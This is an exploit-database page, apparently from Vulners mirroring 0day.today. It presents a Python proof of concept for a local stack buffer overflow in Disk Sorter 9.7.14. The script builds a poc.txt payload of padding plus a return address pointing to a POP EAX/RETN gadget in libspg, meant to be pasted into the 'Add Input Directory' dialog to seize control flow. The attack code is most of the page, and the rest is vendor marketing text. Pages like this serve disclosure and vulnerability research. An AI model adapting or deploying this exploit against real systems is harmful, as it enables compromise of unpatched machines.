Lucene search
K

Disk Sorter 9.7.14 - Input Directory Local Buffer Overflow Exploit

🗓️ 05 Jun 2017 00:00:00Reported by n3ckD_Type 
zdt
 zdt
🔗 0day.today👁 37 Views

DiskSorter v9.7.14 - Local Buffer Overflow Exploi

Code
#!/usr/bin/python
 
######################################
#   Exploit Title:      DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC
#   Date:               25 May 2017
#   Exploit Author:     n3ckD_
#   Vendor Homepage:    http://www.disksorter.com/
#   Software Link:      http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
#   Version:            Disk Sorter v9.7.14 (32-Bit)
#   Tested on:          Windows 7 Enterprise SP1 (Build 7601)
#   Usage:              Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog
######################################
 
print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC"
print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"
 
# in libspg:.text
# 10147C1C   58               POP EAX
# 10147C1D   C3               RETN
ret = "\x1c\x7c\x14\x10"
 
nops = "\x47\x4F"*24
buf = nops + "A"*4048 + ret + "MAGIC" + "\n"
 
f = open("poc.txt","w")
f.write(buf)
f.close()

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jun 2017 00:00Current
7High risk
Vulners AI Score7
37